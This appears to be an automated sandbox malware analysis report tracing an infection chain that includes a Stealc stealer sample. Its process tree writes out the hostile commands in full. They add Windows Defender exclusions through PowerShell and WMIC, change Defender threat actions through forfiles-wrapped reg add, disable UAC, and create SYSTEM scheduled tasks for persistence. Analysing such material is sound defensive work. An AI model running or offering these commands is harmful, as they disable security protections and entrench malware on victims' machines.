\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{85315c9a-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 404 schtasks.exe 1412 schtasks.exe 3464 schtasks.exe 440 schtasks.exe 3504 schtasks.exe 3536 schtasks.exe 2272 schtasks.exe 2468 schtasks.exe 1176 schtasks.exe 2116 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2588 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 2588 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 4836 axplong.exe 4836 axplong.exe 5084 stealc_default.exe 5084 stealc_default.exe 3848 0zwMQZV3j5.exe 2116 h9XoUFzLUU.exe 1408 powershell.exe 1408 powershell.exe 1408 powershell.exe 5084 stealc_default.exe 5084 stealc_default.exe 4892 powershell.exe 4892 powershell.exe 4892 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1668 axplong.exe 1668 axplong.exe 2908 powershell.exe 2908 powershell.exe 2908 powershell.exe 4268 powershell.exe 4268 powershell.exe 4268 powershell.exe 2324 powershell.exe 2324 powershell.exe 4752 powershell.EXE 4752 powershell.EXE 4752 powershell.EXE 2084 powershell.exe 2084 powershell.exe 2084 powershell.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe 3576 fKyKrYk.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2116 h9XoUFzLUU.exe Token: SeBackupPrivilege 2116 h9XoUFzLUU.exe Token: SeDebugPrivilege 3848 0zwMQZV3j5.exe Token: SeSecurityPrivilege 2116 h9XoUFzLUU.exe Token: SeSecurityPrivilege 2116 h9XoUFzLUU.exe Token: SeSecurityPrivilege 2116 h9XoUFzLUU.exe Token: SeSecurityPrivilege 2116 h9XoUFzLUU.exe Token: SeBackupPrivilege 3848 0zwMQZV3j5.exe Token: SeSecurityPrivilege 3848 0zwMQZV3j5.exe Token: SeSecurityPrivilege 3848 0zwMQZV3j5.exe Token: SeSecurityPrivilege 3848 0zwMQZV3j5.exe Token: SeSecurityPrivilege 3848 0zwMQZV3j5.exe Token: SeDebugPrivilege 2300 jsc.exe Token: SeDebugPrivilege 1408 powershell.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeDebugPrivilege 1360 powershell.exe Token: SeIncreaseQuotaPrivilege 1856 WMIC.exe Token: SeSecurityPrivilege 1856 WMIC.exe Token: SeTakeOwnershipPrivilege 1856 WMIC.exe Token: SeLoadDriverPrivilege 1856 WMIC.exe Token: SeSystemProfilePrivilege 1856 WMIC.exe Token: SeSystemtimePrivilege 1856 WMIC.exe Token: SeProfSingleProcessPrivilege 1856 WMIC.exe Token: SeIncBasePriorityPrivilege 1856 WMIC.exe Token: SeCreatePagefilePrivilege 1856 WMIC.exe Token: SeBackupPrivilege 1856 WMIC.exe Token: SeRestorePrivilege 1856 WMIC.exe Token: SeShutdownPrivilege 1856 WMIC.exe Token: SeDebugPrivilege 1856 WMIC.exe Token: SeSystemEnvironmentPrivilege 1856 WMIC.exe Token: SeRemoteShutdownPrivilege 1856 WMIC.exe Token: SeUndockPrivilege 1856 WMIC.exe Token: SeManageVolumePrivilege 1856 WMIC.exe Token: 33 1856 WMIC.exe Token: 34 1856 WMIC.exe Token: 35 1856 WMIC.exe Token: 36 1856 WMIC.exe Token: SeIncreaseQuotaPrivilege 1856 WMIC.exe Token: SeSecurityPrivilege 1856 WMIC.exe Token: SeTakeOwnershipPrivilege 1856 WMIC.exe Token: SeLoadDriverPrivilege 1856 WMIC.exe Token: SeSystemProfilePrivilege 1856 WMIC.exe Token: SeSystemtimePrivilege 1856 WMIC.exe Token: SeProfSingleProcessPrivilege 1856 WMIC.exe Token: SeIncBasePriorityPrivilege 1856 WMIC.exe Token: SeCreatePagefilePrivilege 1856 WMIC.exe Token: SeBackupPrivilege 1856 WMIC.exe Token: SeRestorePrivilege 1856 WMIC.exe Token: SeShutdownPrivilege 1856 WMIC.exe Token: SeDebugPrivilege 1856 WMIC.exe Token: SeSystemEnvironmentPrivilege 1856 WMIC.exe Token: SeRemoteShutdownPrivilege 1856 WMIC.exe Token: SeUndockPrivilege 1856 WMIC.exe Token: SeManageVolumePrivilege 1856 WMIC.exe Token: 33 1856 WMIC.exe Token: 34 1856 WMIC.exe Token: 35 1856 WMIC.exe Token: 36 1856 WMIC.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 4268 powershell.exe Token: SeDebugPrivilege 2324 powershell.exe Token: SeDebugPrivilege 4752 powershell.EXE Token: SeDebugPrivilege 2084 powershell.exe Token: SeDebugPrivilege 2188 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2588 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2588 wrote to memory of 4836 2588 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 82 PID 2588 wrote to memory of 4836 2588 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 82 PID 2588 wrote to memory of 4836 2588 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 82 PID 4836 wrote to memory of 424 4836 axplong.exe 84 PID 4836 wrote to memory of 424 4836 axplong.exe 84 PID 4836 wrote to memory of 424 4836 axplong.exe 84 PID 424 wrote to memory of 2940 424 GOLD.exe 86 PID 424 wrote to memory of 2940 424 GOLD.exe 86 PID 424 wrote to memory of 2940 424 GOLD.exe 86 PID 424 wrote to memory of 2940 424 GOLD.exe 86 PID 424 wrote to memory of 2940 424 GOLD.exe 86 PID 424 wrote to memory of 2940 424 GOLD.exe 86 PID 424 wrote to memory of 2940 424 GOLD.exe 86 PID 424 wrote to memory of 2940 424 GOLD.exe 86 PID 4836 wrote to memory of 3300 4836 axplong.exe 87 PID 4836 wrote to memory of 3300 4836 axplong.exe 87 PID 4836 wrote to memory of 3300 4836 axplong.exe 87 PID 4836 wrote to memory of 2944 4836 axplong.exe 89 PID 4836 wrote to memory of 2944 4836 axplong.exe 89 PID 4836 wrote to memory of 2944 4836 axplong.exe 89 PID 2944 wrote to memory of 3032 2944 newalp.exe 90 PID 2944 wrote to memory of 3032 2944 newalp.exe 90 PID 2944 wrote to memory of 3032 2944 newalp.exe 90 PID 3300 wrote to memory of 1692 3300 crypteda.exe 91 PID 3300 wrote to memory of 1692 3300 crypteda.exe 91 PID 3300 wrote to memory of 1692 3300 crypteda.exe 91 PID 3300 wrote to memory of 1692 3300 crypteda.exe 91 PID 3300 wrote to memory of 1692 3300 crypteda.exe 91 PID 3300 wrote to memory of 1692 3300 crypteda.exe 91 PID 3300 wrote to memory of 1692 3300 crypteda.exe 91 PID 3300 wrote to memory of 1692 3300 crypteda.exe 91 PID 3300 wrote to memory of 1692 3300 crypteda.exe 91 PID 3300 wrote to memory of 1692 3300 crypteda.exe 91 PID 4836 wrote to memory of 2868 4836 axplong.exe 92 PID 4836 wrote to memory of 2868 4836 axplong.exe 92 PID 4836 wrote to memory of 2868 4836 axplong.exe 92 PID 1692 wrote to memory of 2116 1692 RegAsm.exe 93 PID 1692 wrote to memory of 2116 1692 RegAsm.exe 93 PID 1692 wrote to memory of 2116 1692 RegAsm.exe 93 PID 1692 wrote to memory of 3848 1692 RegAsm.exe 94 PID 1692 wrote to memory of 3848 1692 RegAsm.exe 94 PID 1692 wrote to memory of 3848 1692 RegAsm.exe 94 PID 4836 wrote to memory of 5084 4836 axplong.exe 97 PID 4836 wrote to memory of 5084 4836 axplong.exe 97 PID 4836 wrote to memory of 5084 4836 axplong.exe 97 PID 4836 wrote to memory of 4276 4836 axplong.exe 99 PID 4836 wrote to memory of 4276 4836 axplong.exe 99 PID 4836 wrote to memory of 1428 4836 axplong.exe 101 PID 4836 wrote to memory of 1428 4836 axplong.exe 101 PID 4836 wrote to memory of 1428 4836 axplong.exe 101 PID 4276 wrote to memory of 1408 4276 FILE2233.exe 102 PID 4276 wrote to memory of 1408 4276 FILE2233.exe 102 PID 4276 wrote to memory of 2300 4276 FILE2233.exe 104 PID 4276 wrote to memory of 2300 4276 FILE2233.exe 104 PID 4276 wrote to memory of 2300 4276 FILE2233.exe 104 PID 4276 wrote to memory of 2300 4276 FILE2233.exe 104 PID 4276 wrote to memory of 2300 4276 FILE2233.exe 104 PID 4276 wrote to memory of 2300 4276 FILE2233.exe 104 PID 4276 wrote to memory of 2300 4276 FILE2233.exe 104 PID 4276 wrote to memory of 2300 4276 FILE2233.exe 104 PID 4276 wrote to memory of 1188 4276 FILE2233.exe 105 PID 4276 wrote to memory of 1188 4276 FILE2233.exe 105 PID 4276 wrote to memory of 1188 4276 FILE2233.exe 105 PID 2300 wrote to memory of 2856 2300 jsc.exe 109 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" FILE2233.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe"C:\Users\Admin\AppData\Local\Temp\60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:2940
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Users\Admin\AppData\Roaming\h9XoUFzLUU.exe"C:\Users\Admin\AppData\Roaming\h9XoUFzLUU.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Users\Admin\AppData\Roaming\0zwMQZV3j5.exe"C:\Users\Admin\AppData\Roaming\0zwMQZV3j5.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"4⤵
- Executes dropped EXE
PID:3032
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2868
-
-
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe"C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe"3⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Users\Admin\Pictures\GuTcEcCNFDfRxn4taTkm5Qp2.exe"C:\Users\Admin\Pictures\GuTcEcCNFDfRxn4taTkm5Qp2.exe"5⤵
- Executes dropped EXE
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\7zS1410.tmp\Install.exe.\Install.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:508 -
C:\Users\Admin\AppData\Local\Temp\7zS17F8.tmp\Install.exe.\Install.exe /OjjdidWwa "385104" /S7⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:4100 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵
- System Location Discovery: System Language Discovery
PID:2456 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
PID:960 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵PID:1708
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:1672
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4864 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵PID:4656
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵
- System Location Discovery: System Language Discovery
PID:1180
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3336 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵PID:1740
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:3484
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
PID:4584 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵
- System Location Discovery: System Language Discovery
PID:4812 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵
- System Location Discovery: System Language Discovery
PID:4404
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵
- Indirect Command Execution
PID:4348 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵PID:3356
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4892 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force12⤵
- System Location Discovery: System Language Discovery
PID:2252
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"8⤵
- Indirect Command Execution
PID:4264 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵PID:704
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdLMAcyiuofwZlrejw" /SC once /ST 09:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS17F8.tmp\Install.exe\" jm /VdidTsYL 385104 /S" /V1 /F8⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4100 -s 10888⤵
- Program crash
PID:1780
-
-
-
-
-
C:\Users\Admin\Pictures\8NYxJZjsZmkPKrv00HfCzotx.exe"C:\Users\Admin\Pictures\8NYxJZjsZmkPKrv00HfCzotx.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3040
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000090001\MYNEWRDX.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\MYNEWRDX.exe"3⤵
- Executes dropped EXE
PID:1428
-
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1668
-
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe1⤵
- Executes dropped EXE
PID:4812
-
C:\Users\Admin\AppData\Local\Temp\7zS17F8.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS17F8.tmp\Install.exe jm /VdidTsYL 385104 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:960 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3340
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2324 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:3848 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1844
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:4600 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:5116
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4808
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:2960 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:1252 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:4972
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:3016 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:2456 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:3180
-
-
-
-
